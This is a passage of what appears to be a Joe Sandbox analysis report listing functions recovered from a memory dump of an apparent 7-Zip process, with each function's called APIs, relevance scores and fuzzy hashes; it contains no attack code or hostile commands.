Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmemmove
String ID:
API String ID: 3934437811-0
Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
Instruction ID: bf55337317c8981941cf380a8fa695826fd827b5587a73005bbb33305b65f739
Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
Instruction Fuzzy Hash: 30118453701A808BCA219F35E95139ABB90EB427E4F484295EFAD0B7A9DF78D54AC700

Function 00B701A8 Relevance: 5.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B70211
free.MSVCRT ref: 00B7021C
free.MSVCRT ref: 00B70249
free.MSVCRT ref: 00B70254

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
Instruction ID: 0743982c0888d7b90c52a9b860e184c4b3acbcd9a9061661776b2e9cdac81aeb
Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
Instruction Fuzzy Hash: E401C823315A4080C920FB21F45526E93A1EBC2BE5F5452E27EAE677A6CE28C54ECB00

Function 00B58CDC Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B589D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 00B589EA

CreateFileW.KERNELBASE ref: 00B58D51
CreateFileW.KERNEL32 ref: 00B58DA4
free.MSVCRT ref: 00B58DB2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CreateFile$CloseHandlefree
String ID:
API String ID: 210839660-0
Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
Instruction ID: 4af2c48af3e3d1e50b2bf397a19dfc53b5a4efd945c62234d88983b4a9ba05cc
Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
Instruction Fuzzy Hash: 96217F332046919AC7609F15A84175A77A4F39A7F5F5403A5EFB563BE4CF38C89A8B00

Function 00B92CFC Relevance: 4.6, APIs: 3, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00B53274: memmove.MSVCRT ref: 00B532AC

fputs.MSVCRT ref: 00B92D41
fputs.MSVCRT ref: 00B92DCF
free.MSVCRT ref: 00B92DFF

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$fputcfreememmove
String ID:
API String ID: 1158454270-0
Opcode ID: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
Instruction ID: 89f15ff36ea462057833d04a4a441ca96f6276686658ed4cdc44314f5dcb6348
Opcode Fuzzy Hash: eef8350ceeca3f9f5c16306e4864ccddccb6ae17d882d2c6956f16779c2a39dd
Instruction Fuzzy Hash: B42192A2705A0190CF24EF25E85136E63A0EB86BE5F4492B1EE5F47769DF2CC549C704

Function 00B5CE1C Relevance: 3.9, APIs: 3, Instructions: 178COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B5CF85
memmove.MSVCRT ref: 00B5CFB7
GetLastError.KERNEL32 ref: 00B5D020

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLast$memmove
String ID:
API String ID: 3796167841-0
Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
Instruction ID: d704e93760b1eb8ccac4b76f72f6acd0490cc4565e52226329d388437da0464a
Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
Instruction Fuzzy Hash: 0851E7233107549BDF258E7AD55076927E1F704796F1402E6DF0A87B50DB39E8AEC300

Function 00B52300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00B52311

Strings

Kernel , xrefs: 00B52300

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputc
String ID: Kernel
API String ID: 1992160199-1736990243
Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
Instruction ID: 1107c6b1669591a6a253255b5ac33eaf7dba985ebf5c5a8fe37b3303f19ab12d
Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
Instruction Fuzzy Hash: 06C09295B94A0882EF181BBBE8853392222D75DFA1F186030CF1D4B390DA2CD4E68725

Function 00B9B1C8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B9B20D
fputs.MSVCRT ref: 00B9B232

Part of subcall function 00B52B04: _CxxThrowException.MSVCRT ref: 00B52B2D
Part of subcall function 00B52B04: free.MSVCRT ref: 00B52B44

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrowfputsfreememset
String ID:
API String ID: 3104931167-0
Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
Instruction ID: fcc6b8fc747818a22a8632700296a73d2c4b64ed5e42568d02901be89e528e72
Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
Instruction Fuzzy Hash: 3901AD677006909AEB09DF6BEA84B5E7BA0F759B94F088462DF0807711DB74D8AAC310

Function 00B58A60 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,00000003,?,00B58E1D), ref: 00B58A99
GetLastError.KERNEL32(?,?,00000003,?,00B58E1D), ref: 00B58AA6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
Instruction ID: 5fd568d9686f161a2af3f2f397c38c1554fcebf05b25915005705c8417219068
Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
Instruction Fuzzy Hash: AAF0FC62B017C083DF208B79E4447683391E75979AF6C40A3CF0853760DF29C8DACB10

Function 00B90994 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B909D5

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B909E9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputcfputsfree
String ID:
API String ID: 2822829076-0
Opcode ID: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
Instruction ID: 9dfb14c281c6f4a3ca602ad48f5b35a1c71b92060617489d88fb666c3503f01c
Opcode Fuzzy Hash: 54155317de61db0833888d5a21ec2303f9cbf572859454e8d3a2ab1476f005a9
Instruction Fuzzy Hash: 43F0826321194480CA20EB25E84531E6360E789BF8F4843A0EE6D577E9DF28C58AC700

Function 00B84035 Relevance: 2.6, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B8404D
memmove.MSVCRT ref: 00B84087

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memmove$ExceptionThrowfreemalloc
String ID:
API String ID: 1415420288-0
Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
Instruction ID: 8fa9fc44d38e25c7a8dc30580a5ac94cb6cf9fe757a73d58d9005d10e331b276
Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
Instruction Fuzzy Hash: 4831B3673196C196CA31FF14E1942EEBBA0F791740F4040A6CB9D47B29EF38D659CB00

Function 00B84054 Relevance: 2.6, APIs: 2, Instructions: 61COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B84065
memmove.MSVCRT ref: 00B84087

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memmove$ExceptionThrowfreemalloc
String ID:
API String ID: 1415420288-0
Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
Instruction ID: 93ab88cf596a6c8f01a3e342aaba604d6782a41ad3a883e1cdef66042e18ca9c
Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
Instruction Fuzzy Hash: E511AFA23156C692CE31FB15F0D53AEA790E791790F9084B6CB9D47B69DF38C689CB00

Function 00B79A34 Relevance: 2.5, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B79A84
free.MSVCRT ref: 00B79A95

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
Instruction ID: cdefe8262882718632894b2197a52b9115ec2a69311dfba68c12fccf7edb7177
Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
Instruction Fuzzy Hash: EEF08123303A9086DA20AB26E84026D6760EB86FB1F1883A0DF7D17B91CF24C84BC300

Function 00B9C7D4 Relevance: 2.5, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

memmove.MSVCRT ref: 00B9C815
free.MSVCRT ref: 00B9C81D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrowfreemallocmemmove
String ID:
API String ID: 1097815484-0
Opcode ID: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
Instruction ID: dd3648c739d6637214833d69dadeba111c41d4306956c33c2b5b37958340c096
Opcode Fuzzy Hash: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
Instruction Fuzzy Hash: 1B0181777025888BCB14DF26D4A156DB7A4E789F99B08C169DF054B358CA34DC8ACB90

Function 00B90A1C Relevance: 2.5, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B90A42
LeaveCriticalSection.KERNEL32 ref: 00B90A73

Part of subcall function 00B9B480: GetTickCount.KERNEL32 ref: 00B9B49E
Part of subcall function 00B9B480: strcmp.MSVCRT ref: 00B9B4E3
Part of subcall function 00B9B480: wcscmp.MSVCRT ref: 00B9B502
Part of subcall function 00B9B480: strcmp.MSVCRT ref: 00B9B568

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
String ID:
API String ID: 3267814326-0
Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
Instruction ID: 30443f5ced1bbabc4f7d9d83de31c72a4af706548a1a503c09aea446841a1a21
Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
Instruction Fuzzy Hash: 68F05E62210A5082EB109F24E8457A97364E744FB5F144335DE7D477E4CF38859AC354

Function 00B52568 Relevance: 2.5, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 00B53274: memmove.MSVCRT ref: 00B532AC

free.MSVCRT ref: 00B525B5
free.MSVCRT ref: 00B525C0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
Instruction ID: 6771098050e05e211d2f2661e497b708e16010cfaa312c18f11bfc2bc2197ba2
Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
Instruction Fuzzy Hash: 80E0A72221694051CE20EB20E40105A67A0E7C67F5B4423D1BEBF137F9CE28C24ECF00

Function 00B52130 Relevance: 2.5, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00B52134
_CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrowmalloc
String ID:
API String ID: 2436765578-0
Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
Instruction ID: f07ab3c5967088b0735ace7c0010e634febcf8c597a42d9150339575e7606bb2
Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
Instruction Fuzzy Hash: F6D01250B2B685E1DE04A75498823157BA0A799750F905095E65A41725DB5CC18FCB05

Function 00B6251C Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
Instruction ID: 1d3f27c3bd769231b609f7e65a0c98f2974874413a5d595c804a8e028e2906c3
Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
Instruction Fuzzy Hash: 7A514872644EC195EB72CF25C4806ED3BA1F389F98F6941B6CE9A4A719DF28C885C710

Function 00B786E0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SysStringByteLen.OLEAUT32 ref: 00B78744

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ByteString
String ID:
API String ID: 4236320881-0
Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
Instruction ID: c6c7d3ed1452256f7d050177b084a434d7bd52e26f4ec2b309f903c4a832c6b4
Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
Instruction Fuzzy Hash: 6E11821625878182E3648B28A48476A62A0E7847E4F64C360EFEF577E4EF3CCD85C705

Function 00B58C98 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B58A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00B58E1D), ref: 00B58A99
Part of subcall function 00B58A60: GetLastError.KERNEL32(?,?,00000003,?,00B58E1D), ref: 00B58AA6

SetEndOfFile.KERNELBASE ref: 00B58CC7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: File$ErrorLastPointer
String ID:
API String ID: 841452515-0
Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
Instruction ID: 5ce7318c7ea5d35c1fc34440aaf8fb567d84fc68a3e22678521f60c2d8c0601b
Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
Instruction Fuzzy Hash: FAE02612301494C2E7209BE1A48176A8390EB447E2F4890F1AE4563B488E658CDE8710

Function 00B564D4 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B56464: FreeLibrary.KERNELBASE(?,?,?,00B564E7), ref: 00B56475

LoadLibraryExW.KERNELBASE ref: 00B564F4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: Library$FreeLoad
String ID:
API String ID: 534179979-0
Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
Instruction ID: 474b0b9caf3629c2d50ec0ec9064cbcd9cee55bdab97159ffbbc219064811c32
Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
Instruction Fuzzy Hash: 4AD02E11B0066582EE102BA6788136803402F15BE2FC8C0F09F0A43310EF280CEFA300

Function 00B58BF0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00B58C1F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

